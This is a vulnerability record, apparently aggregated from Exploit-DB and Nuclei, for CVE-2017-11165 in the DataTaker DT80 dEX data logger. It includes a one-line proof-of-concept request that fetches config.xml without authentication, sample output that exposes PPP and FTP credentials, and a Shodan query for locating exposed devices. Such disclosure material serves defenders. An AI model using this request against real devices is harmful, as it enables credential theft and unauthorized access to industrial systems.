DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure

vendor:

DT80 dEX

by:

Nassim Asrir

9,8

CVSS

CRITICAL

Sensitive Configurations Exposure

200

CWE

Product Name: DT80 dEX

Affected Version From: 1.50.012

Affected Version To: 1.50.012

Patch Exists: NO

Related CWE: CVE-2017-11165

CPE: 2.3:a:datataker:datataker_dt80_dex:1.50.012

Metasploit: N/A

Other Scripts: N/A

Tags: lfr,edb,cve,cve2017,datataker,config,packetstorm,exposure

CVSS Metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Nuclei References: https://www.exploit-db.com/exploits/45094, https://packetstormsecurity.com/files/143328/DataTaker-DT80-dEX-1.50.012-Sensitive-Configuration-Exposure.html, https://www.exploit-db.com/exploits/42313/, https://nvd.nist.gov/vuln/detail/CVE-2017-11165

Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.title:"datataker"', 'verified': True, 'vendor': 'datataker', 'product': 'dt80_dex_firmware'}

Platforms Tested: Windows 7

2017

DataTaker DT80 dEX 1.50.012 – Sensitive Configurations Exposure

DataTaker DT80 dEX 1.50.012 is susceptible to information disclosure. A remote attacker can obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI, thereby possibly accessing sensitive information, modifying data, and/or executing unauthorized operations.

Mitigation:

Ensure that the configuration file is not accessible to unauthorized users.

Source

Exploit-DB raw data:

[+] Title: DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure
[+] Credits / Discovery: Nassim Asrir
[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: CVE-2017-11165
 
Vendor:
===============
 
http://www.datataker.com/
  
  
About:
========

The dataTaker DT80 smart data logger provides an extensive array of features that allow it to be used across a wide variety of applications. The DT80 is a robust, stand alone, low power data logger featuring USB memory stick support, 18 bit resolution, extensive communications capabilities and built-in display.

The dataTaker DT80’s Dual Channel concept allows up to 10 isolated or 15 common referenced analog inputs to be used in many combinations. With support for multiple SDI-12 sensor networks, Modbus for SCADA systems, FTP and Web interface, 12V regulated output to power sensors, the DT80 is a totally self contained solution.  
  
Vulnerability Type:
===================
 
Sensitive Configurations Exposure.
 
 
issue:
===================
 
dataTaker dEX 1.350.012 allows remote attackers to obtain sensitive configuration information via
a direct request for the /services/getFile.cmd?userfile=config.xml URI.
  
POC:
===================

http://victim/services/getFile.cmd?userfile=config.xml


Output:
========

<config id="config" onReset="yes" projectFileVersion="2" targetDevice="DT80-3" targetSeries="3" cemCount="1" version="2.0">
<environment>
<application version="1.50.012" build="2014-01-07, 15:16:53"/>
<flashPlayer version="WIN 11.7.700.169" type="PlugIn(non-debugger)"/>
<operatingSystem version="Windows 7"/><firmware version="9.14.5407"/>
<screen resolution="1024x768"/>
</environment>

etc....

<loggerSetting category="PPP" profile="USER">username</loggerSetting>

<loggerSetting category="PPP" profile="PASSWORD">password</loggerSetting>

<loggerSetting category="FTP_SERVER" profile="PORT">21</loggerSetting>

<loggerSetting category="FTP_SERVER" profile="USER">arrdhor</loggerSetting>

<loggerSetting category="FTP_SERVER" profile="PASSWORD">arrdhor</loggerSetting>

<loggerSetting category="FTP_SERVER" profile="ALLOW_ANONYMOUS">YES</loggerSetting>